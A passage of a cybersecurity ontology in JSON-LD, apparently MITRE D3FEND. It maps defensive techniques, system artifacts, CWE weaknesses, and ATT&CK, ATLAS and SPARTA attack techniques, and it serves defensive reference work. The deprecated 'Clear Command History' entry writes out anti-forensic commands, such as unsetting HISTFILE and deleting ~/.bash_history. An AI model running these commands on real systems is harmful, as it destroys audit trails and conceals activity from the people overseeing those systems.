        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N9d4029c54bd84a67aa3c7d011777c65d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProgramModeCommand"
      }
    },
    {
      "@id": "d3f:HardwareDeviceEnabledEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a device becomes operational and available for use, typically following initialization, activation, or repair.",
      "rdfs:label": "Hardware Device Enabled Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceStateEvent"
        },
        {
          "@id": "_:N89081a1b1c0d483abddee55d6b2c0c2b"
        }
      ]
    },
    {
      "@id": "_:N89081a1b1c0d483abddee55d6b2c0c2b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDeviceConnectionEvent"
      }
    },
    {
      "@id": "d3f:Reference-VariableInitialization_CWE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://cwe.mitre.org/data/definitions/457.html"
      },
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:VariableInitialization"
      },
      "d3f:kb-reference-title": "CWE-457: Use of Uninitialized Variable",
      "rdfs:label": "Reference - Variable Initialization - CWE-457"
    },
    {
      "@id": "d3f:DomainTrustPolicy",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainTrustPolicy"
      ],
      "d3f:d3fend-id": "D3-DTP",
      "d3f:definition": "Restricting inter-domain trust by modifying domain configuration.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-HowTrustRelationshipsWorkForResourceForestsInAzureActiveDirectoryDomainServices"
      },
      "d3f:restricts": [
        {
          "@id": "d3f:DirectoryService"
        },
        {
          "@id": "d3f:T1087.002"
        }
      ],
      "rdfs:label": "Domain Trust Policy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessPolicyAdministration"
        },
        {
          "@id": "_:N9f50bcdfbe4e44f1a339f4b797f11e95"
        },
        {
          "@id": "_:Nf0f477a9aa4e495ab7ddf1da6221611e"
        }
      ]
    },
    {
      "@id": "_:N9f50bcdfbe4e44f1a339f4b797f11e95",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DirectoryService"
      }
    },
    {
      "@id": "_:Nf0f477a9aa4e495ab7ddf1da6221611e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:T1087.002"
      }
    },
    {
      "@id": "d3f:T1485",
      "@type": "owl:Class",
      "d3f:attack-id": "T1485",
      "d3f:definition": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.",
      "rdfs:label": "Data Destruction",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:HMIApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:OTControlFunction"
      },
      "d3f:definition": "Application software which runs the main program in an HMI.",
      "d3f:instructs": {
        "@id": "d3f:HMIApplicationProcess"
      },
      "rdfs:label": "HMI Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N9b367c4e5b5c4144a7bdbbd4e2ae855b"
        },
        {
          "@id": "_:Nb566134236334deea7d31b09bbab9271"
        }
      ]
    },
    {
      "@id": "_:N9b367c4e5b5c4144a7bdbbd4e2ae855b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlFunction"
      }
    },
    {
      "@id": "_:Nb566134236334deea7d31b09bbab9271",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HMIApplicationProcess"
      }
    },
    {
      "@id": "d3f:CCI-001373_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, examines the information for the presence of organization-defined unsanctioned information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001373"
    },
    {
      "@id": "d3f:VMImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:SystemStateImage"
      },
      "d3f:definition": "A Virtual Machine Image (VMI) is a file that encapsulates the entire state of a virtual machine at a given point in time. This includes the operating system, applications, data, and configurations. VMIs are used to create and replicate virtual machines, ensuring consistency and reliability across different environments.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.ituonline.com/tech-definitions/what-is-a-virtual-machine-image/"
      },
      "rdfs:label": "Virtual Machine Image",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Virtual_machine_image"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:StorageImage"
        },
        {
          "@id": "_:N754b144c118c46dc859cd7b43fad4626"
        }
      ],
      "skos:altLabel": "VM Image"
    },
    {
      "@id": "_:N754b144c118c46dc859cd7b43fad4626",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemStateImage"
      }
    },
    {
      "@id": "d3f:Reference-BiometricChallenge-ResponseAuthentication-Accenture",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.patentguru.com/US2021110015A1"
      },
      "d3f:kb-abstract": "Secret biometric responses to authentication challenges for MFA.\n\nMethods, systems, and apparatus, including computer programs encoded on computer storage media, for authenticating users based on a sequence of biometric authentication challenges. In one aspect, a process includes receiving a first image of the face of the user and processing the first image according to a first authentication process to determine whether the face of the user shown in the first image matches the face of an authorized user. A second authentication process including a sequence of biometric authentication challenges is identified. The sequence includes at least one facial expression challenge. The user is authenticated in response to determining that the first authentication process is satisfied based on the face of the user shown in the first image matching the face of the authorized user and the second authentication process is satisfied based on the user providing a valid biometric response to each biometric authentication challenge.",
      "d3f:kb-author": "Ben McCarty, Ellie Daw",
      "d3f:kb-mitre-analysis": "MITRE Analysis was not found.",
      "d3f:kb-organization": "Accenture",
      "d3f:kb-reference-of": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:kb-reference-title": "Biometric Challenge-Response Authentication",
      "rdfs:label": "Reference - Biometric Challenge-Response Authentication - Accenture"
    },
    {
      "@id": "d3f:T1527",
      "@type": "owl:Class",
      "d3f:attack-id": "T1527",
      "d3f:definition": "Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1550.001",
      "rdfs:label": "Application Access Token",
      "rdfs:seeAlso": {
        "@id": "d3f:T1550.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        }
      ]
    },
    {
      "@id": "d3f:SoftwarePatch",
      "@type": "owl:Class",
      "d3f:definition": "A patch is a piece of software designed to update a computer program or its supporting data, to fix or improve it. This includes fixing security vulnerabilities and other bugs, with such patches usually called bugfixes or bug fixes, and improving the usability or performance. Although meant to fix problems, poorly designed patches can sometimes introduce new problems (see software regressions). In some special cases updates may knowingly break the functionality, for instance, by removing components for which the update provider is no longer licensed or disabling a device.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Patch_(computing)"
      },
      "rdfs:label": "Software Patch",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      },
      "skos:altLabel": "Patch"
    },
    {
      "@id": "d3f:AML.T0076",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0076",
      "d3f:definition": "An adversary may purposefully corrupt a malicious AI model file so that it cannot be successfully deserialized in order to evade detection by a model scanner. The corrupt model may still successfully execute malicious code before deserialization fails.",
      "rdfs:label": "Corrupt AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0076"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Corrupt AI Model"
    },
    {
      "@id": "d3f:CWE-1233",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1233",
      "d3f:definition": "The product uses a register lock bit protection mechanism, but it does not ensure that the lock bit prevents modification of system registers or controls that perform changes to important hardware system configuration.",
      "rdfs:label": "Security-Sensitive Hardware Controls with Missing Lock Bit Protection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-284"
        },
        {
          "@id": "d3f:CWE-667"
        }
      ]
    },
    {
      "@id": "d3f:T1542.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1542.001",
      "d3f:definition": "Adversaries may modify system firmware to persist on systems. The BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)",
      "d3f:modifies": {
        "@id": "d3f:SystemFirmware"
      },
      "rdfs:label": "System Firmware",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1542"
        },
        {
          "@id": "_:Nb2405e59c49545929eea5a10973fcdb6"
        }
      ]
    },
    {
      "@id": "_:Nb2405e59c49545929eea5a10973fcdb6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirmware"
      }
    },
    {
      "@id": "d3f:ST0006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to avoid being detected.",
      "d3f:display-order": 6,
      "rdfs:label": "Defense Evasion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0006"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Defense Evasion"
    },
    {
      "@id": "d3f:addressed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x addressed-by y: Relates a resource x (e.g., network host, peripheral device, disk sector, a memory cell or other logical or physical entity) to a discrete address y in an address space that points to it.",
      "owl:inverseOf": {
        "@id": "d3f:addresses"
      },
      "rdfs:label": "addressed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:DS0003",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)",
      "d3f:exactly": {
        "@id": "d3f:ScheduledJob"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Scheduled Job Metadata component",
      "rdfs:label": "Scheduled Job (ATT&CK DS)"
    },
    {
      "@id": "d3f:OTEngineeringSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Software used in an industrial process to help engineers design, test, and maintain OT. This software enables the programming of OT controllers.",
      "d3f:produces": {
        "@id": "d3f:OTControlProgram"
      },
      "rdfs:label": "OT Engineering Software",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DeveloperApplication"
        },
        {
          "@id": "_:Nc8cfa00b38bd4f39937b8659b7960b79"
        }
      ]
    },
    {
      "@id": "_:Nc8cfa00b38bd4f39937b8659b7960b79",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:EventLogClearEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the event log data is cleared from the system, often as part of log maintenance or potentially to cover tracks.",
      "rdfs:label": "Event Log Clear Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:CWE-311",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-311",
      "d3f:definition": "The product does not encrypt sensitive or critical information before storage or transmission.",
      "rdfs:label": "Missing Encryption of Sensitive Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:TerminateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "On many computer operating systems, a computer process terminates its execution by making an exit system call. More generally, an exit in a multithreading environment means that a thread of execution has stopped running. For resource management, the operating system reclaims resources (memory, files, etc.) that were used by the process. The process is said to be a dead process after it terminates.",
      "d3f:terminates": {
        "@id": "d3f:Process"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Exit_(system_call)"
      },
      "rdfs:label": "Terminate Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nbcab1ffc2de349ea9ca2c36896a677a0"
        }
      ]
    },
    {
      "@id": "_:Nbcab1ffc2de349ea9ca2c36896a677a0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:terminates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:T1146",
      "@type": "owl:Class",
      "d3f:attack-id": "T1146",
      "d3f:definition": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1070.003",
      "rdfs:label": "Clear Command History",
      "rdfs:seeAlso": {
        "@id": "d3f:T1070.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:EX-0012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0012",
      "d3f:definition": "The attacker alters live or persistent data that the spacecraft uses to make decisions and route work. Targets include device and control registers, parameter and limit tables, internal routing/subscriber maps, schedules and timelines, priority/QoS settings, watchdog and timer values, autonomy/FDIR rule tables, ephemeris and attitude references, and power/thermal setpoints. Many missions expose legitimate mechanisms for updating these artifacts, direct memory read/write commands, table load services, file transfers, or maintenance procedures, which can be invoked to steer behavior without changing code. Edits may be transient (until reset) or latched/persistent across boots; they can be narrowly scoped (a single bit flip on an enable mask) or systemic (rewriting a routing table so commands are misdelivered). The effect space spans subtle biasing of control loops, selective blackholing of commands or telemetry, rescheduling of operations, and wholesale changes to mode logic, all accomplished by modifying the values the software already trusts and consumes.",
      "d3f:modifies": {
        "@id": "d3f:RuntimeVariable"
      },
      "rdfs:label": "Modify On-Board Values - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:N00bd4549d0554220954a8ca2dc9e0849"
        }
      ],
      "skos:prefLabel": "Modify On-Board Values"
    },
    {
      "@id": "_:N00bd4549d0554220954a8ca2dc9e0849",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a new registry key is added to the Windows Registry, establishing a new hierarchical node for configuration.",
      "rdfs:label": "Windows Registry Key Creation Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:N26b26df215fa4311b4230a03368ceb7f"
        }
      ]
    },
    {
      "@id": "_:N26b26df215fa4311b4230a03368ceb7f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyImportEvent"
      }
    },
    {
      "@id": "d3f:initiates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x initiates y: The entity or action x starts or triggers entity or function y, bringing it into action.",
      "rdfs:label": "initiates",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1049",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1049",
      "d3f:definition": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.",
      "d3f:may-invoke": {
        "@id": "d3f:GetOpenSockets"
      },
      "rdfs:label": "System Network Connections Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N07c61a7993c74e9d86abc62f5a968e1f"
        }
      ]
    },
    {
      "@id": "_:N07c61a7993c74e9d86abc62f5a968e1f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetOpenSockets"
      }
    },
    {
      "@id": "d3f:T1036.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036.010",
      "d3f:definition": "Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)",
      "rdfs:label": "Masquerade Account Name",
      "rdfs:subClassOf": {
        "@id": "d3f:T1036"
      }
    },
    {
      "@id": "d3f:LinuxOpenAtArgumentO_CREAT",
      "@type": "owl:Class",
      "d3f:definition": "Create a regular file. Same functionality as Linux Open but slight differences in parameter.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/openat.2.html"
      },
      "rdfs:label": "Linux OpenAt Argument O_CREAT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:CWE-31",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-31",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize 'dir\\..\\..\\filename' (multiple internal backslash dot dot) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: 'dir\\..\\..\\filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:ATTACKICSPrivilegeEscalationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0111"
      },
      "rdfs:label": "Privilege Escalation Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N5b3d9b8ce6a04ef1a2647fbd85bacf2f"
        }
      ],
      "skos:prefLabel": "Privilege Escalation Technique"
    },
    {
      "@id": "_:N5b3d9b8ce6a04ef1a2647fbd85bacf2f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0111"
      }
    },
    {
      "@id": "d3f:ResumeProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:resumes": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Resume Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N3c4d108b575348859ad7046c144d0b5d"
        }
      ]
    },
    {
      "@id": "_:N3c4d108b575348859ad7046c144d0b5d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:resumes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:RegOpenKeyExW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyExW"
    },
    {
      "@id": "d3f:StackFrameCanary",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Stack canaries, named for their analogy to a canary in a coal mine, are used to detect a stack buffer overflow before execution of malicious code can occur. This method works by placing a small integer, the value of which is randomly chosen at program start, in memory just before the stack return pointer. Most buffer overflows overwrite memory from lower to higher memory addresses, so in order to overwrite the return pointer (and thus take control of the process) the canary value must also be overwritten. This value is checked to make sure it has not changed before a routine uses the return pointer on the stack. This technique can greatly increase the difficulty of exploiting a stack buffer overflow because it forces the attacker to gain control of the instruction pointer by some non-traditional means such as corrupting other important variables on the stack.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Stack_buffer_overflow#Stack_canaries"
      },
      "rdfs:label": "Stack Frame Canary",
      "rdfs:subClassOf": {
        "@id": "d3f:StackComponent"
      },
      "skos:altLabel": "Stack Canary"
    },
    {
      "@id": "d3f:DE-0009.03",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009.03",
      "d3f:definition": "Decoys and deceptive signatures are used to provoke defenders into committing limited resources early, inspection vehicles, interceptors, laser dwell time, maneuver fuel, or analyst attention. The attacker deploys objects or emissions that mimic credible threats (trajectories, RCS/brightness, modulation) so tracking and discrimination systems prioritize the decoy. While defenses engage, the true operation proceeds with reduced scrutiny, or follows shortly after when defensive capacity and timelines are depleted. The effect is resource exhaustion and timeline compression on the defender’s side, increasing the success window for the actual action.",
      "rdfs:label": "Trigger Premature Intercept - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0009"
      },
      "skos:prefLabel": "Trigger Premature Intercept"
    },
    {
      "@id": "d3f:T1115",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1115",
      "d3f:definition": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.",
      "d3f:reads": {
        "@id": "d3f:Clipboard"
      },
      "rdfs:label": "Clipboard Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N0b5058d8ee1643ebb51cef9307e9ef8b"
        }
      ]
    },
    {
      "@id": "_:N0b5058d8ee1643ebb51cef9307e9ef8b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Clipboard"
      }
    },
    {
      "@id": "d3f:JobSchedulerSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:ScheduledJob"
      },
      "d3f:definition": "A job scheduler software is operating system software that when run executes scheduled tasks (time-scheduling in the sense of wall clock time; not operating system scheduling of processes for multitasking). Processes running such software are task scheduler processes. In Windows, Scheduled Tasks are created and managed by the Task Scheduler. In Unix-like OSes, the `cron` utitility serves a similar role.",
      "d3f:modifies": [
        {
          "@id": "d3f:JobSchedule"
        },
        {
          "@id": "d3f:ScheduledJob"
        }
      ],
      "d3f:synonym": "Task Scheduler Software",
      "rdfs:label": "Job Scheduler Software",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ScheduledJob"
        },
        {
          "@id": "dbr:Cron"
        },
        {
          "@id": "dbr:Windows_Task_Scheduler"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemServiceSoftware"
        },
        {
          "@id": "_:Ne2ee5564cbf54ef78044f58f67641ef4"
        },
        {
          "@id": "_:N61d076592b274c7ab7d015a9bd2eeb8a"
        },
        {
          "@id": "_:N5ee1e03d80e744b58c886530ba2b5a4f"
        }
      ]
    },
    {
      "@id": "_:Ne2ee5564cbf54ef78044f58f67641ef4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "_:N61d076592b274c7ab7d015a9bd2eeb8a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedule"
      }
    },
    {
      "@id": "_:N5ee1e03d80e744b58c886530ba2b5a4f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "d3f:CWE-241",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-241",
      "d3f:definition": "The product does not handle or incorrectly handles when a particular element is not the expected type, e.g. it expects a digit (0-9) but is provided with a letter (A-Z).",
      "rdfs:label": "Improper Handling of Unexpected Data Type",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-228"
      }
    },
    {
      "@id": "d3f:CWE-236",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-236",
      "d3f:definition": "The product does not handle or incorrectly handles when a particular parameter, field, or argument name is not defined or supported by the product.",
      "rdfs:label": "Improper Handling of Undefined Parameters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-233"
      }
    },
    {
      "@id": "d3f:OTRemoteModeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Command that places the controller in a mode capable of receiving read/write communication from a networked entity.",
      "rdfs:label": "OT Remote Mode Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:Nc8c0c5fd597943c58387561e1d3a4193"
        },
        {
          "@id": "_:Nc2763cadc42b43d8bcdfef5e07b899ca"
        },
        {
          "@id": "_:N01833faf6be3479fbc800b20fb17b22e"
        }
      ]
    },
    {
      "@id": "_:Nc8c0c5fd597943c58387561e1d3a4193",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "_:Nc2763cadc42b43d8bcdfef5e07b899ca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N01833faf6be3479fbc800b20fb17b22e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTRemoteModeCommand"
      }
    },
    {
      "@id": "rdfs:seeAlso",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:CWE-1248",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1248",
      "d3f:definition": "The security-sensitive hardware module contains semiconductor defects.",
      "rdfs:label": "Semiconductor Defects in Hardware Logic with Security-Sensitive Implications",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CWE-646",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-646",
      "d3f:definition": "The product allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion.",
      "rdfs:label": "Reliance on File Name or Extension of Externally-Supplied File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:Reference-AllLoginsSinceLastBoot_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2015-07-001/"
      },
